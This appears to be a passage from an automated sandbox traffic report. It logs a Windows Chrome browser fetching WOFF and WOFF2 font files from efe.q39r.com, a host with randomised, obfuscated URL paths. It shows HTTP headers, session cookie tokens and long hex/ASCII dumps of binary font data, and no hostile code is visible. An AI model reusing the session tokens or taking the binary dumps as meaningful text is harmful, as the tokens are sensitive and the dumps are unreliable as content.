                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=phtPioQoUZ0RdZvbs5ykk%2FzSvP1GA0c7b77pfGu4CozfvgbEiAOwVFKVeYtxzpjsxmMUDX3MRf%2B%2FKMu7DSd3alFsxf8uIgVtDnzkSZ689m9xyRulhj0v5vsEIbgc7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada008d45083-ATL
                                                                                  2024-04-25 16:23:33 UTC754INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                                                  Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a f8 15 ea 2a d8 f3 54 21 6f c2 78 9b
                                                                                  Data Ascii: Jjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J*T!ox
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c 00 a9 f7 14 b2 63 f0 af 00 c7 c9 e4
                                                                                  Data Ascii: zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!Lc
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6 15 ad 96 20 b3 6f a5 d2 1c f3 b4 ad
                                                                                  Data Ascii: 9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=` o
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22 f1 ae 1c b8 d6 92 7b a4 fa 52 3f b9
                                                                                  Data Ascii: X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"{R?
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64 11 0d 42 9c dc 43 37 22 56 16 d3 50
                                                                                  Data Ascii: <Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;idBC7"VP
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da 9a 6b ae 31 f7 b8 74 e1 56 6e a3 2b
                                                                                  Data Ascii: X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifMk1tVn+
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad e7 c6 8f 17 6c dc 35 75 dd f9 65 eb
                                                                                  Data Ascii: `\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}l5ue
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1 28 c6 66 00 ca 63 ca bc 0e 5d f4 d7
                                                                                  Data Ascii: <(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA(fc]
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9 a7 9f 1e bd 7b 87 f8 ac 9c ea a8 f0 c8 75 6a 4b
                                                                                  Data Ascii: p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o{ujK


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.1749749172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:32 UTC1421OUTGET /56wgt99Sy67foh23sxX40uDyhst60 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Origin: https://efe.q39r.com
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: font
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:33 UTC624INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:33 GMT
                                                                                  Content-Type: font/woff2
                                                                                  Content-Length: 28584
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="56wgt99Sy67foh23sxX40uDyhst60"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hF3vt3hnbtt%2FKJ0HZO4WWYUfopSQLl8h1tSItwugpqTG81G0hkSOMzG1k6UH%2FV%2F6esvOTWdBbmBmq3YJ4VqxDVx55fM2PBJjiDXvoTIJEbmC9JrNi3RdLKJb3fjFKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada01a4c6765-ATL
                                                                                  2024-04-25 16:23:33 UTC745INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                                                  Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 0b 20 00 9e 7f f7 d3 db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2
                                                                                  Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ X
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 4d be ef 69 9d 44 eb 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a
                                                                                  Data Ascii: MiD0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 3b c2 fb bf fc 8c 82 bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46
                                                                                  Data Ascii: ;ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCF
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 0c 09 37 5f 5d ca 6d 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d
                                                                                  Data Ascii: 7_]m*,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`np
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: 2a 13 91 05 2e 44 bf ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06
                                                                                  Data Ascii: *.D^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=
                                                                                  2024-04-25 16:23:33 UTC1369INData Raw: b5 46 e9 89 d1 1b ab 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f
                                                                                  Data Ascii: F{CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=o
